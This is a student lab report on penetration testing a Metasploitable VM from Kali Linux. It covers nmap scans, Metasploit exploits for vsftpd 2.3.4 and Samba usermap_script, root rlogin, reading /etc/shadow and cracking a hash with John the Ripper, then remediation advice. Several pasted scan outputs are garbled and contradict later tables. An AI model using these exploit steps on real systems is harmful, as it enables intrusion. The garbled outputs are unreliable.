Network Penetration Testing with Real-World Exploits and Security Remediation

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Project objectives

Introduction:

This project is based on performing penetration testing in a controlled lab environment to simulate attacks that hackers may use to exploit real systems. Using Kali Linux as the attack platform and Metasploitable as the vulnerable target system, I explore various stages of ethical hacking including scanning, enumeration, exploitation, privilege escalation, and remediation. The purpose is to gain hands-on experience in identifying, exploiting, and mitigating vulnerabilities responsibly.

Theory about the project:

Network penetration testing is the process of evaluating a system's network security by simulating attacks from malicious outsiders and insiders. The goal is to find security loopholes before attackers do. It includes multiple phases:

- **Reconnaissance:** Gathering information about the target.
- Scanning & Enumeration: Actively probing to find open ports, services, and vulnerabilities.
- Exploitation: Gaining unauthorized access using known exploits.
- **Post-Exploitation:** Activities like privilege escalation or data access.
- Remediation: Providing security measures to patch vulnerabilities.

Project requirements

Two Operating System

- 1. Kali Linux (Attacking machine)
- 2. Metasploitable machine (Target Machine)

Tools Details:

Kali Linux	The attacker machine, containing pre-installed penetration testing tools.
Metasploitable	A vulnerable machine to practice attacks on.
nmap	For network scanning, port discovery, OS detection, and service version enumeration.
Metasploit Framework	For exploiting known vulnerabilities in services running on the target.
John the Ripper	For cracking hashed passwords obtained from /etc/shadow.

Tasks

```
Jasic Network St

Image -v 192.168.16

Inmap -v 192.168.160.131

Discovered open port 22/tcp on 192.168.160.131

Discovered open port 22/tcp on 192.168.160.131

Discovered open port 23/tcp on 192.168.160.131

Discovered open port 33/tcp on 192.168.160.131

Discovered open port 13/tcp on 192.168.160.131

Discovered open port 13/tcp on 192.168.160.131

Discovered open port 13/tcp on 192.168.160.131

Discovered open port 192/tcp on 192.168.160.131

Discovered open port 192/tcp on 192.168.160.131

Discovered open port 26/drtp on 192.168.160.131

Discovered open port 26/drtp on 192.168.160.131

Discovered open port 80/drtp on 192.168.160.131

Discovered open port 80/drtp on 192.168.160.131

Discovered open port 80/drtp on 192.168.160.131

Discovered open port 81/drtp on 192.168.160.131

Discovered open ssh

23/drtp open ssh

23/drtp open shell

109/drtp open mitpestick

24/drtp op
```

Task 2 - Reconnaissance

Task 1: Scanning for hidden Ports

nmap -v -p- 192.168.160.131

Output:

```
Discovered open port 36588/cp on 192.168.160.131

Discovered open port 5632/cp on 192.168.160.131

Discovered open port 5662/trc on 192.168.160.131

Discovered open port 5662/trc on 192.168.160.131

Discovered open port 5632/trc on 192.168.160.131

Discovered open port 3632/trc on 192.168.160.131

Discovered open port 2862/trc on 192.168.160.131

Not shown: 65580 closed trc ports (conn-refused)

Port of 1862/trc open shown and the state of 1862/trc open shown and the state of 1862/trc open shown and the state of 1862/trc open shown and 1862/trc open nethiod 1862/trc open nethiod
```

Total Hidden Ports = 7

List of hidden ports

- 1.8787
- 2.36588
- 3.53204
- 4. 53452
- 5.59437
- 6.3632
- 7.6697

Task 2: Service Version Detection

nmap -v -sV 192.168.160.131

Output:

```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rebios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open telnet closed state of the state of t
```

Task 3: Operating System Detection

nmap -v -O 192.168.160.132

Output:

```
STATE SERVICE
21/tcp
         open
               ftp
22/tcp
         open
23/tcp
               telnet
         open
25/tcp
               smtp
         open
53/tcp
         open domain
80/tcp
         open http
        open rpcbind
open netbios-ssn
111/tcp
139/tcp
445/tcp
512/tcp
         open microsoft-ds
         open exec
513/tcp
         open login
514/tcp
        open
               shell
1099/tcp open rmiregistry
1524/tcp open
               ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:AB:A7:B8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.023 days (since Wed May 14 21:27:32 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
```

Task 3 - Enumeration

Target IP Address – 192.168.160.131

Operating System Details -

MAC Address: 00:0C:29:AB:A7:B8 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Services Version with open ports (LIST ALL THE OPEN PORTS EXCLUDING HIDDEN PORTS)

PORT	STATE	SERVICE VERSION
21/tcp	open ftp	vsftpd 2.3.4
22/tcp	open ssh	OpenSSH 4.7p1 Debian
		8ubuntu1 (protocol 2.0)
23/tcp	Open telnet	Linux telnetd
25/tcp	open smtp	Postfix smtpd

53/tcp	open domain	ISC BIND 9.4.2
80/tcp	open http	Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp	open rpcbind	2 (RPC #100000)
139/tcp	open netbios-ssn	Samba smbd 3.X - 4.X (workgroup: WORKGROUP
445/tcp	open netbios-ssn	Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp	open exec	netkit-rsh rexecd
513/tcp	open login	OpenBSD or Solaris rlogind
514/tcp	open tcpwrapped	
1099/tcp	open java-rmi	GNU Classpath grmiregistry
1524/tcp	open bindshell	Metasploitable root shell
2049/tcp	open nfs	2-4 (RPC #100003)
2121/tcp	open ftp	ProFTPD 1.3.1
3306/tcp	open mysql	MySQL 5.0.51a-3ubuntu5
5432/tcp	open postgresql	PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp	open vnc	VNC (protocol 3.3)
6000/tcp	open X11	(access denied)
6667/tcp	open irc	UnrealIRCd
8009/tcp	open ajp13	Apache Jserv (Protocol v1.3)
8180/tcp	open http	Apache Tomcat/Coyote JSP engine 1.1

Hidden Ports with Service Versions (ONLY HIDDEN PORTS)

- 1. 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
- 2. 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- 3. 6697/tcp open irc UnrealIRCd
- 4. 35851/tcp open mountd 1-3 (RPC #100005)
- 5. 36571/tcp open nlockmgr 1-4 (RPC #100021)
- 6. 44585/tcp open java-rmi GNU Classpath grmiregistry
- 7. 51228/tcp open status 1 (RPC #100024)

Task 4- Exploitation of services

1. vsftpd 2.3.4 (Port 21 - FTP)

- msfconsole
- use exploit/unix/ftp/vsftpd_234_backdoor
- > set RHOST 192.168.160.131
- > set RPORT 21
- run

2. SMB 3.0.20-Debian (Port 443)

- search smb version
- use auxiliary/scanner/smb/smb version
- use exploit/multi/samba/usermap_script
- > show options
- > set RHOST 192.168.160.131
- > run

```
LHOST 192.168.160.133 yes The listen address (an interface may be specified)

Exploit target:

Id Name

Automatic

View the full module info with the info, or info -d command.

Masse yeloit(walt/reats/decreap_script) > set RHOST 192.168.160.131

RHOST = 192.168.160.131

RHOST = 192.168.160.131

Safe exploit(walt/reats/decreap_script) > run

Safe exploi
```

3. Exploiting R Services (Port 512,513,514)

- nmap -p 512,513,514 -sC -sV --script=vuln 192.168.160.131
- rlogin -l root 192.168.160.131

Task 5 - Create user with root permission

- adduser rahul
- password hello
- sudo usermod -aG sudo rahul
- cat /etc/passwd | grep rahul
- rahul:x:1002:1002:,,,:/home/rahul:/bin/bash
- sudo cat /etc/shadow | grep rahul0x
- rahul:\$y\$j9T\$ep3Qv2Hy8a5uO71kK7yOm0\$rxMKpQlW2n/XflTYSpcCljAKbKROVgZHXHr50E5e d.4:20223:0:99999:7:::

Task 6 - Cracking password hashes

nano rahul_hash.txt

```
(root@kali)-[~/john-jumbo/run]
# cat rahul_hash.txt
$y$j9T$ep3Qv2Hy8a5u071kK7y0m0$rxMKpQlW2n/XflTYSpcCljAKbKROVgZHXHr50E5ed.4
```

./john rahul_hash.txt

```
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [0:unknown 1:descrypt 2:mdScrypt 3:summd5 4:bcrypt 5:sha256crypt 6:sha512crypt 7:scrypt 10:yescrypt 11:gost-yescrypt]) is 10 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: Passwords longer than 24 [worst case UTF-8] to 72 [ASCII] rejected
Proceeding with single, rules:Single
Press 'q' or ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:./password.lst
Enabling duplicate candidate password suppressor using 256 MiB
hello
(r)
1 g :000:00:00 DNE 2/3 (2025-05-15 17:57) 0.2994g/s 28.74c/s 28.74c/s 28.74c/s 123456..pepper
Use the "--show" option to display all of the cracked passwords reliably
```

./john rahul_hash.txt –show

```
(root@ kali)-[~/john-jumbo/run]

# ./john rahul_hash.txt --show

?:hello

1 password hash cracked, 0 left
```

Task 7 - Remediation

1. FTP Service (vsftpd)

Current Version: vsftpd 2.3.4

Latest Version: vsftpd 3.0.5 (as of 2025)

Vulnerability: Version 2.3.4 is affected by a backdoor vulnerability where an attacker can gain a root shell if a malicious payload is sent. This is one of the most serious vulnerabilities in vsftpd.

CVE:

CVE-2011-2523

Reference: https://www.youtube.com/watch?v=G7nIWUMvn0o

Remediation:

- Option 1: Upgrade to vsftpd 3.0.5
- Option 2: Disable FTP and use more secure alternatives like SFTP (via SSH)

2. SMB 3.0.20-Debian (Port 443)

• Service: Samba SMB

• Current Version: 3.0.20

• Latest Version: Samba 4.20.1 (as of May 2025)

- Vulnerabilities:
 - SMB version 3.0.20 is vulnerable to:
 - Remote Code Execution (RCE)
 - Null session attacks
 - Arbitrary file write/read
- Common CVEs:
 - o CVE-2007-2447 Samba "username map script" command injection
 - o CVE-2017-7494 Arbitrary code execution
- Impact: Attackers can exploit these flaws to gain shell access, move laterally, or dump credentials.
- Remediation Steps:
 - o Disable SMBv1 and restrict access to trusted IPs only
 - Upgrade Samba to the latest stable version (v4.20.1)
 - o Harden the /etc/samba/smb.conf file to disable guest access and enable logging
- Reference: https://www.youtube.com/watch?v=HPP70Bx0Eck
- 3. R Services (Ports 512 rexec, 513 rlogin, 514 rsh)
 - Services: Rexec, Rlogin, Rsh (Legacy UNIX services)
 - Status: Outdated, Insecure, and Deprecated

Vulnerabilities:

- o Transmit credentials in plaintext
- Vulnerable to MITM (Man-in-the-Middle) and replay attacks
- Weak or no authentication mechanism
- Allow unauthorized remote access if .rhosts files are misconfigured

• CVEs:

 <u>CVE-1999-0651</u> – R-services allow remote attackers to access without proper authentication.

Impact:

 Any user on the network can potentially impersonate others and execute remote commands

• Remediation Steps:

- o Immediately disable the rsh, rlogin, and rexec services:
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0651

Major Learning From this project

Through this project, I learned how to create and manage users in Linux and how their details are stored in system files. I understood how passwords are saved in hashed format and how they can be cracked using tools like John the Ripper with wordlists. I also used Nmap to scan systems for open ports, detect services running on them, and check the operating system. For this, I used commands like nmap -v to find open ports, nmap -sV to find service versions, and nmap -O to detect the OS. I explored services like SMB and R services, identified outdated or risky ones, and understood why they should be updated or disabled. Finally, I learned how to find problems in a system and suggest fixes like updating software or using better configurations. This hands-on work helped me understand system security better.